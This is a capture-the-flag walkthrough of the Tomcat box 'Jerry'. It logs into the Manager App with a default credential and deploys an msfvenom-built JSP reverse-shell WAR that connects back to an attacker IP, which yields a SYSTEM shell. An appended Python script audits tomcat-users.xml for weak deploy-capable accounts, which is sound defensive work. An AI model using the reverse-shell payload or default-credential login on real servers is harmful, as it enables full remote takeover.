Again, we start with nmap -sC -sV -Pn -oA ./jerry 10.10.10.95
There we go. We have a web page. Granted, it's the default Tomcat page, but it's something. Looking around, we find that the Manager App button takes us to http://10.10.10.95:8080/manager/html, which asks for a password. A quick Google search finds several possible default credentials.
Trying a few, we get in successfully with tomcat:s3cret.
In the Manager App, we see an Upload WAR section that can quickly deploy WAR files. WAR files are basically zipped up JSP files. MSFVenom can build a WAR reverse shell payload using:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.27 LPORT=9999 -f war > shell.war
Upload that WAR file and deploy it. Then visit the newly created /[filename] directory. For me it was http://10.10.10.95:8080/shell. A quick whoami shows that we are already NT AUTHORITY\SYSTEM. Grab the flags at C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt
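A defender-side check for the weakness used above, as an added example that is not part of the original write-up: it parses a tomcat-users.xml and flags accounts that hold a deploy-capable Manager role and use the default pair found here, an empty password, or a password equal to the username. The sample XML is constructed, and the function and constant names are hypothetical.

```python
import xml.etree.ElementTree as ET

# Manager roles that can deploy applications (HTML GUI and text interface).
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# The pair from this write-up; extend with your own list of published defaults.
KNOWN_DEFAULTS = {("tomcat", "s3cret")}

# Constructed sample input, not taken from the host in the write-up.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="deploy" roles="manager-script,admin-gui"/>
  <user username="monitor" password="s3cret" roles="manager-status"/>
  <user username="ops" password="kT9#vQ2!xLm4@wRz" roles="manager-gui"/>
</tomcat-users>
"""


def local(tag):
    """Strip an XML namespace prefix such as {http://tomcat.apache.org/xml}."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, reason) for each risky account that can deploy WARs."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if local(elem.tag) != "user":
            continue
        user = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if not roles & DEPLOY_ROLES:
            continue  # this account cannot reach the deploy function
        if (user, password) in KNOWN_DEFAULTS:
            findings.append((user, "published default credential"))
        elif password == "":
            findings.append((user, "empty password"))
        elif password.lower() == user.lower():
            findings.append((user, "password equals username"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE):
        print(f"{user}: {reason}")
```

The monitor account reuses the default password but is not reported, because manager-status cannot deploy applications.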